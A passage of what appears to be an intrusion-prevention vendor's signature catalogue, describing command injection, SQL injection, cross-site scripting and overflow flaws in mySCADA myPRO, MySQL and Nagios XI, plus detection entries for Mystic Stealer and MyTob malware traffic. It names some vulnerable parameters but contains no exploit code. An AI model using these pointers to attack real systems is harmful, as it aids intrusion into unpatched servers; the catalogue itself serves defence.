Description: A command injection vulnerability has been reported in mySCADA myPRO. The vulnerability is due to insufficient sanitization of user data used in commands. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in command execution in the security context of the root user.
Situation: HTTP_CRL-mySCADA-myPRO-Datafromviewscripts-Command-Injection
References:
CVE-2022-2234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2234
Back to top

mySCADA-myPRO-Manager-Unauthenticated-Command-Injection-CVE-2024-47407

About this vulnerability: A vulnerability in MyPRO Manager
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Windows
Software: mySCADA myPRO
Type: Input Validation
Description: A vulnerability in mySCADA MyPRO Manager, versions v1.2 and before, which allows remote attackers to execute arbitrary commands on the target system, due to the insufficient user input validation to the email parameter.
Situation: HTTP_CS-mySCADA-myPRO-Manager-Unauthenticated-Command-Injection-CVE-2024-47407
References:
CVE-2024-47407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47407
Back to top

MySQL-And-MariaDB-Incorrect-Cast-Policy-Bypass-Vulnerability

About this vulnerability: A policy bypass vulnerability in MySQL and MariaDB
Risk: High
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL;MariaDB
Type: Malfunction
Description: An incorrect cast has been reported in MySQL and MariaDB. The vulnerability is due to the reliance on memcpy() returning a value between -128 and 127. A remote, unauthenticated attacker can exploit this vulnerability by repeatedly trying to connect to the affected database service.
Situation: Analyzer_MySQL-Brute-Force
References:
CVE-2012-2122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
BID-53911
http://www.securityfocus.com/bid/53911
Back to top

MySQL-Authentication-Bypass

About this vulnerability: MySQL allows unauthorized access
Risk: Moderate
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: MySQL allows unauthorised access, caused by a vulnerability in the check_scramble_323 function. A remote attacker can supply a specially-crafted authentication packet containing an arbitrary passwd_len value, which will allow the attacker to bypass authentication and gain unauthorized access to the database.
Situation: MySQL_MySQL-Authentication-Bypass
MySQL_Mysql-Authentication-BOF
MySQL_Mysql-Authentication-Bypass-2
References:
CVE-2004-0627
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0627
BID-10654
http://www.securityfocus.com/bid/10654
Back to top

Mysql-Com_Table_Dump-Function-Stack-Overflow

About this vulnerability: A vulnerability in MySQL AB MySQL
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in the MySQL database server product. The flaw is created by improperly implemented boundary checks on incoming user input. An authenticated attacker with limited privileges may exploit this issue to execute arbitrary code on the vulnerable host within the context of the server process. In the case where code injection was unsuccessful, the affected service will terminate. Note that on Linux and Unix-based systems, the service will be restarted immediately, whereas on Windows-based systems, this is not the case by default. Regardless, all transactions and connections present at the time of termination will be aborted. In the case where code inject and execution is successful, the behaviour of the target system will depend on the nature of the injected code. On Windows-based systems, the injected code will be run in the security context of the system user, which will cause the system compromise. On Linux and Unix-based systems, the injected code will run with limited privileges.
Situation: MySQL_TableDump-Function-Stack-Overflow
Back to top

MySQL-Create-Function-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the CREATE FUNCTION command in MySQL
Risk: Moderate
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: MySQL
Type: Input Validation
Description: The MySQL CREATE FUNCTION command has a vulnerability in the handling of the function names. If the name of the function that is given to the CREATE FUNCTION command is longer than 50 characters, a stack buffer overflow occurs. A remote attacker is able to exploit this vulnerability to cause a denial of service or to execute arbitrary code on the victim machine.
Situation: MySQL_Create-Function-Command-Buffer-Overflow
References:
CVE-2005-2558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2558
BID-14509
http://www.securityfocus.com/bid/14509
Back to top

MySQL-Failed-Login

About this vulnerability: Failed MySQL login
Risk: Low
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A failed MySQL login attempt has been detected. This can be a normal failed login, but in large numbers it can may a sign of a brute-force attack.
Situation: MySQL_SS-Failed-Login
Back to top

MySQL-Login-Handshake-Information-Disclosure

About this vulnerability: A vulnerability in MySQL
Risk: Low
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: There is an information disclosure vulnerability in MySQL database. The vulnerability is due to a flaw in the server component responsible for the login handshake procedure and allows an attacker with anonymous access to the database to read sensitive data stored in the memory of the server. The attacker then may use the acquired information to compromise the server or to facilitate other attack attempts. After an attack attempt exploiting this vulnerability, the information in the memory may be disclosed to the attacker. At the same time, the server will continue operating normally in almost all attack scenarios, as the affected process is not likely to perform any more illegal operations.
Situation: MySQL_CS-MySQL-Login-Handshake-Information-Disclosure
Back to top

MySQL-Msdos-Device-Name-DoS

About this vulnerability: Denial of service vulnerability in MySQL database server
Risk: Low
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MySQL
Type: Malfunction
Description: MySQL database server contains a denial of service flaw when handling requests that contain a MS-DOS device name (AUX, CON, COM1, LPT1 or PRN). An authenticated remote attacker with certain privileges could cause a denial of service by sending a use command followed by an MS-DOS device name.
Situation: MySQL_MySQL-Msdos-Device-Name-DoS
References:
CVE-2005-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0799
OSVDB-14748
http://www.osvdb.org/14748
Back to top

MySQL-MySQL-Server-Date-Format-Function-Format-String

About this vulnerability: Format string vulnerability in the handling of the DATE_FORMAT function in MySQL
Risk: Moderate
First detected in: sgpkg-ips-74-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Format String
Description: MySQL has a format string vulnerability in the handling of the DATE_FORMAT function. The vulnerability can be exploited to cause a denial of service condition by giving a malformed first parameter to the DATE_FORMAT function.
Situation: MySQL_MySQL-Server-Date-Format-Function-Format-String
References:
CVE-2006-3469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3469
BID-19032
http://www.securityfocus.com/bid/19032
OSVDB-27416
http://www.osvdb.org/27416
Back to top

MySQL-MySQL-yaSSL-SSL-Hello-Message-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of the client Hello message in MySQL
Risk: High
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Buffer Overflow
Description: MySQL has a buffer overflow vulnerability in the handling of the client Hello message. The vulnerability can be exploited to compromise the vulnerable system by giving a malformed Cipher Specs parameter during a handshaking session.
Situation: MySQL_MySQL-yaSSL-SSL-Hello-Message-Buffer-Overflow
References:
CVE-2008-0226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226
BID-27140
http://www.securityfocus.com/bid/27140
Back to top

MySQL-Server-Create-Function-Arbitrary-Code-Execution

About this vulnerability: Remote code execution vulnerability in MySQL
Risk: Moderate
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: MySQL database server has an arbitrary code execution vulnerability in the CREATE FUNCTION statement. An authenticated remote attacker with INSERT and DELETE privileges could exploit this vulnerability by using CREATE FUNCTION to access libc calls.
Situation: MySQL_MySQL-Server-Create-Function-Arbitrary-Code-Execution
References:
CVE-2005-0709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0709
BID-12781
http://www.securityfocus.com/bid/12781
OSVDB-14678
http://www.osvdb.org/14678
Back to top

MySQL-Server-Mysql-Func-Table-Library-Injection-Vulnerability

About this vulnerability: Arbitrary library injection vulnerability in MySQL
Risk: Moderate
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: MySQL database server contains an arbitrary library injection vulnerability. An authenticated remote user with INSERT or UPDATE privileges could exploit this vulnerability to load and execute arbitrary libraries by using INSERT INTO or UPDATE to modify the mysql.func table.
Situation: MySQL_MySQL-Server-Mysql-Func-Table-Library-Injection-Vulnerability
References:
CVE-2005-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0710
BID-12781
http://www.securityfocus.com/bid/12781
OSVDB-14677
http://www.osvdb.org/14677
Back to top

MySQL-Sun-MySQL-mysql_log-Format-String-Vulnerability

About this vulnerability: Format string vulnerability in the handling of the COM_CREATE_DB and COM_DROP_DB commands in MySQL
Risk: Moderate
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Format String
Description: MySQL has a format string vulnerability in the handling of the COM_CREATE_DB and COM_DROP_DB commands. The vulnerability can be exploited to cause a denial of service, terminating the affected application due to a read access violation.
Situation: MySQL_Sun-MySQL-mysql-log-Format-String-Vulnerability
References:
CVE-2009-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2446
BID-35609
http://www.securityfocus.com/bid/35609
OSVDB-55734
http://www.osvdb.org/55734
Back to top

MySQL-XML-Functions-Scalar-Xpath-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in MySQL
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Input Validation
Description: There is a vulnerability in the MySQL database engine. The vulnerability is due to insufficient input validation of XML functions used in SQL statements. A remote authenticated attacker can exploit this vulnerability by sending crafted requests to the target host. Successful exploitation causes a denial of service (DoS) condition in the MySQL database services on the target host. In a successful attack, the affected server terminates and all established connections are terminated.
Situation: MySQL_CS-MySQL-XML-Functions-Scalar-Xpath-Denial-Of-Service
References:
BID-33972
http://www.securityfocus.com/bid/33972
Back to top

MySQL-yaSSL-CertDecoder::GetName-Buffer-Overflow

About this vulnerability: A MySQL yaSSL CertDecoder::GetName Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: YaSSL
Type: Buffer Overflow
Description: A vulnerability in the CertDecoder::GetName function of YaSSL, versions before 1.9.9, which allows remote attackers to execute arbitrary code or cause a denial of service condition by sending an X.509 client certificate with a crafted name field.
Situation: Generic_HTTP-MySQL-yaSSL-CertDecoder::GetName-Buffer-Overflow
References:
CVE-2009-4484
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4484
BID-37640
http://www.securityfocus.com/bid/37640
OSVDB-61956
http://www.osvdb.org/61956
Back to top

Mystic-Stealer-Malware-C2-Traffic

About this vulnerability: An attempt to exploit a vulnerability in Mystic Stealer Malware detected
Risk: High
First detected in: sgpkg-ips-1603-5242
Last changed: sgpkg-ips-1603-5242
Platform: Generic
Software: Mystic Stealer Malware
Type: Backdoor
Description: This fingerprint matches Mystic Stealer malware's traffic to their C2 servers.
Situation: Generic_CS-Mystic-Stealer-Malware-C2-Traffic
Back to top

Mytob

About this vulnerability: MyTob
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: MyTob is a Botnet that is controlled via IRC.
Situation: Generic_CS-Mytob-Traffic
Back to top

Nagios-Command-Execution

About this vulnerability: A Nagios Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios
Type: Input Validation
Description: A vulnerability in Nagios, versions before 3.1.1, which allows remote attackers to execute arbitrary commands via metacharacters in the Ping or Traceroute parameters.
Situation: HTTP_CRL-Nagios-Command-Execution
References:
CVE-2009-2288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2288
OSVDB-55281
http://www.osvdb.org/55281
Back to top

Nagios-Core-Cgi-Process_cgivars-Off-By-One

About this vulnerability: A vulnerability in Nagios Enterprises Core
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios
Type: Malfunction
Description: There is an Off-By-One flaw in Nagios Core. The problem is caused by improper boundary check when validating the parameters passed to the application. A remote authenticated attacker could exploit this vulnerability by sending a request with a crafted long parameter value. Successful exploitation could result in the CGI crash.
Situation: HTTP_CSU-Nagios-Core-Cgi-Process_cgivars-Off-By-One
References:
CVE-2013-7108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7108
Back to top

Nagios-Core-Config-Manager-Tfpassword-SQL-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Core Config Manager
Risk: Moderate
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios; Nagios XI
Type: Input Validation
Description: Nagios Core Config Manager is vulnerable to an SQL Injection vulnerability. The vulnerability is due to a lack of validation on the tfPassword parameter passed to the application. A remote unauthenticated attacker could exploit this vulnerability by sending a request with a crafted tfPassword parameter value. Successful exploitation could result in attacker controlled SQL code being executed on the server or possibly authentication bypass.
Situation: HTTP_CRL-Nagios-Core-Config-Manager-Tfpassword-SQL-Injection
References:
OSVDB-99942
http://www.osvdb.org/99942
Back to top

Nagios-History.cgi-Parameter-Buffer-Overflow

About this vulnerability: A vulnerability in Nagios Enterprises Nagios
Risk: Moderate
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Nagios. The vulnerability is due to insufficient validation of the host parameter when it is processed by the history.cgi program. A remote, authenticated attacker can exploit this vulnerability by sending an excessively long host value. This can lead to code execution in the context of the affected application.
Situation: HTTP_CRL-Nagios-History.cgi-Parameter-Buffer-Overflow
References:
CVE-2012-6096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6096
BID-56879
http://www.securityfocus.com/bid/56879
OSVDB-88322
http://www.osvdb.org/88322
Back to top

Nagios-Log-Server-Audit-Log-And-Alert-History-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Log Server
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Generic
Software: Nagios Enterprises Log Server
Type: Input Validation
Description: Two reflected cross-site scripting vulnerabilities have been reported in Nagios Log Server. The vulnerabilities are due to insufficient validation of user input in HTTP requests to audit log and alert history page with start and end URI query parameters. A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could result in arbitrary script execution in the target user's browser.
Situation: HTTP_CRL-Nagios-Log-Server-Audit-Log-And-Alert-History-Reflected-Cross-Site-Scripting
References:
CVE-2021-35478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35478
Back to top

Nagios-Log-Server-Create_Snapshot-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Log Server
Risk: High
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Platform: Generic
Software: Nagios Enterprises Log Server
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Nagios Log Server. The vulnerability is due to insufficient validation of user input in HTTP requests submitted to create_snapshot endpoint. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Nagios-Log-Server-Create_Snapshot-Stored-Cross-Site-Scripting
Back to top

Nagios-Log-Server-Mail-Settings-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Log Server
Risk: Moderate
First detected in: sgpkg-ips-1309-5242
Last changed: sgpkg-ips-1309-5242
Platform: Generic
Software: Nagios Enterprises Log Server
Type: Input Validation
Description: Improper validation of HTTP requests causes a cross-site scripting vulnerability in Nagios. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Nagios-Log-Server-Mail-Settings-Stored-Cross-Site-Scripting
Back to top

Nagios-Log-Server-User-Profile-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Log Server
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios Enterprises Log Server
Type: Input Validation
Description: Insufficient validation of user profile information in the user profile page causes a cross-site scripting vulnerability in Nagios Log Server. A successful exploit allows an attacker to run arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Nagios-Log-Server-User-Profile-Stored-Cross-Site-Scripting
References:
CVE-2020-6586
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6586
Back to top

Nagios-Network-Analyzer-Create-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Nagios Network Analyzer
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios
Type: Input Validation
Description: The lack of CSRF protection on the user creation form in create_user.php in Nagios causes a vulnerability which can be exploited to create a user with administrative privileges on the target.
Situation: HTTP_CS-Nagios-Network-Analyzer-Create-Cross-Site-Request-Forgery
Back to top

Nagios-Network-Analyzer-Report-Generator-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Network Analyzer
Risk: Moderate
First detected in: sgpkg-ips-818-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios
Type: Input Validation
Description: A command execution vulnerability in Nagios allows an attacker to run arbitrary code on the target system. The vulnerability is caused by improper validation of HTTP requests relating to report generation.
Situation: HTTP_CRL-Nagios-Network-Analyzer-Report-Generator-Command-Injection
Back to top

Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in Nagios Enterprises Nagios Remote Plugin Executor
Risk: High
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios Remote Plugin Executor
Type: Input Validation
Description: A command execution vulnerability has been found in Nagios Remote Plugin Executor. The vulnerability is due to insufficient validation of user-provided parameters against shell metacharacters. A remote, unauthenticated attacker could exploit this vulnerability to execute arbitrary commands on the vulnerable machine with the privileges of the affected service.
Situation: Generic_CS-Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution
References:
CVE-2013-1362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362
BID-58142
http://www.securityfocus.com/bid/58142
OSVDB-90582
http://www.osvdb.org/90582
Back to top

Nagios-Remote-Plugin-Executor-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios Remote Plugin Executor
Risk: Moderate
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios Remote Plugin Executor
Type: Input Validation
Description: A command injection vulnerability has been found in Nagios Remote Plugin Executor. The vulnerability is due to insufficient validation of user-provided parameters containing newline characters. A remote, unauthenticated attacker could exploit this vulnerability to execute arbitrary commands on the vulnerable machine with the privileges of the affected service.
Situation: Generic_CS-Nagios-Remote-Plugin-Executor-Command-Injection
References:
BID-66969
http://www.securityfocus.com/bid/66969
OSVDB-106007
http://www.osvdb.org/106007
Back to top

Nagios-Statuswml-Cgi-Command-Injection

About this vulnerability: A vulnerability in Nagios
Risk: Moderate
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios
Type: Malfunction
Description: There exists a command injection vulnerability in Nagios. A remote attacker can use this to execute arbitrary commands on the affected system.
Situation: HTTP_CRL-Nagios-Statuswml-Cgi-Command-Injection
References:
CVE-2009-2288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2288
Back to top

Nagios-XI--Windows-Winrm-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: Improper validation of multiple fields in the WinRM configuration wizard causes a command injection vulnerability in Nagios. A successful exploitation allows an attacker to execute arbitrarycommands on the target system.
Situation: HTTP_CS-Nagios-XI-Windows-Winrm-Command-Injection
Back to top

Nagios-XI-Account-Email-Address-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of the user's email address in various modules of the application. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in arbitrary script code execution in the target user's browser.
Situation: HTTP_CRL-Nagios-XI-Account-Email-Address-Stored-Cross-Site-Scripting
Back to top

Nagios-XI-Account-Main-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: Insufficient validation of the theme parameter in account/main.php causes a cross-site scripting vulnerability in Nagios XI. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Nagios-XI-Account-Main-Stored-Cross-Site-Scripting
References:
CVE-2020-10821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10821
Back to top

Nagios-XI-Ajaxhelper.php-Cmdsubsys-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A command injection vulnerability has been reported in Nagios XI. This vulnerability is due to insufficient validation of the input parameters in the ajaxhelper.php script. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to a target service. Successful exploitation will result in arbitrary command execution by user nagios on the target server.
Situation: HTTP_CRL-Nagios-XI-Ajaxhelper.php-Cmdsubsys-Command-Injection
References:
CVE-2020-15901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15901
Back to top

Nagios-XI-Alert-Cloud-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: High
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of incoming requests sent to index.php. The vulnerability can be exploited by a remote attacker by enticing the target user to follow a malicious link. Successful exploitation of this vulnerability would allow injection and execution of arbitrary HTML and script code in the target user's browser in the security context of the affected server.
Situation: HTTP_CSU-Nagios-XI-Alert-Cloud-Cross-Site-Scripting
Back to top

Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931

About this vulnerability: A vulnerability in Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Platform: Generic
Software: Nagios XI
Type: SQL Injection
Description: An SQL injection vulnerability in the Announcement Banners feature of the Nagios XI versions from 5.11.0 to 5.11.1 allows an authenticated attacker to execute arbitrary SQL commands.
Situation: HTTP_CRL-Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931-CVE-2023-40933
References:
CVE-2023-40931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40931
Back to top

Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40933

About this vulnerability: A vulnerability in Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Platform: Generic
Software: Nagios XI
Type: SQL Injection
Description: An SQL injection vulnerability in the Announcement Banners feature of the Nagios XI v5.11.1 and earlier allows an authenticated attacker with banner configuration privileges to execute arbitrary SQL commands.
Situation: HTTP_CRL-Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931-CVE-2023-40933
References:
CVE-2023-40933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40933
Back to top

Nagios-XI-API-Key-Regeneration-Privilege-Escalation

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Malfunction
Description: Insufficient validation of command options submitted to ajaxhelper.php for the getxicoreajax action causes a privilege escalation in Nagios XI. A successful exploitation allows an attacker to gain administrative privileges on the target.
Situation: HTTP_CRL-Nagios-XI-API-Key-Regeneration-Privilege-Escalation
References:
CVE-2018-15711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15711
Back to top

Nagios-XI-Authenticated-Remote-Command-Execution

About this vulnerability: A vulnerability in Nagios XI
Risk: High
First detected in: sgpkg-ips-1234-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Nagios XI
Type: Input Validation
Description: There exists a vulnerability in Nagios XI, versions before 5.6.6, which allows remote attackers to execute arbitrary code by uploading a malicious plugin.
Situation: HTTP_CS-Nagios-XI-Authenticated-Remote-Command-Execution
References:
CVE-2019-15949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15949
Back to top

Nagios-XI-Autodiscovery-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: An arbitrary command execution vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of incoming requests sent to the Autodiscovery module. The vulnerability can be exploited by an authenticated attacker by submitting a maliciously crafted job to the Autodiscovery tool. Successful exploitation of this vulnerability would allow injection and execution of arbitrary commands on the affected server in the context of root.
Situation: HTTP_CRL-Nagios-XI-Autodiscovery-Arbitrary-Command-Execution
Back to top

Nagios-XI-Autodiscovery-Job-Command-Injection

About this vulnerability: A vulnerability in Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: There has been reported a command injection vulnerability in the Autodiscovery Job component of Nagios XI. Authenticated attacker could exploit this vulnerability to gain arbitrary code execution on the target server.
Situation: HTTP_CRL-Nagios-XI-Autodiscovery-Job-Command-Injection
References:
CVE-2019-9164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9164
Back to top

Nagios-XI-Autodiscovery-WebShell-Upload

About this vulnerability: A vulnerability in Nagios XI.
Risk: High
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Platform: Generic
Software: Nagios XI
Type: Directory Traversal
Description: A vulnerability in Nagios XI, versions before 5.8.5, which allow remote attackers to execute arbitrary code by uploading a PHP web shell via a directory traversal in the job id field.
Situation: HTTP_CRL-Nagios-XI-Autodiscovery-WebShell-Upload
References:
CVE-2021-37343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37343
Back to top

Nagios-XI-Autodiscovery_Component_Update_Cron-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A command injection vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient input validation of the requests submitted to the Auto-Discovery endpoint. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in arbitrary command execution with privileges of the web server on the target system.
Situation: HTTP_CRL-Nagios-XI-Autodiscovery_Component_Update_Cron-Command-Injection
References:
CVE-2020-28648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28648
Back to top

Nagios-XI-Bulk-Modification-Tool-Bulkmodifications.inc.php-SQL-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1386-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A SQL injection vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient input validation of requests handled by bulkmodifications.inc.php. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in execution of arbitrary SQL statements, which may cause disclosure of sensitive information leading to further compromises.
Situation: HTTP_CRL-Nagios-XI-Bulk-Modification-Tool-Bulkmodifications.inc.php-SQL-Injection
References:
CVE-2021-37350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37350
Back to top

Nagios-XI-CCM-Admin_views.inc.php-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in Nagios XI CCM
Risk: High
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Nagios XI
Type: Input Validation
Description: There exists a vulnerability in Nagios XI, versions before 5.7.2, which allows remote attackers to overwrite arbitrary files by sending a crafted request to the target server, due to the insufficient validation of the request parameter in admin_views.inc.php in the Static Config Editor tool.
Situation: HTTP_CRL-Nagios-XI-CCM-Admin_views.inc.php-Arbitrary-File-Overwrite
Back to top

Nagios-XI-Cmdsubsys-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: Insufficient input validation causes a command injection vulnerability in Nagios. A successful exploit allows an attacker to run arbitrary commands on the target system.
Situation: HTTP_CRL-Nagios-XI-Cmdsubsys-Command-Injection
References:
CVE-2018-15709
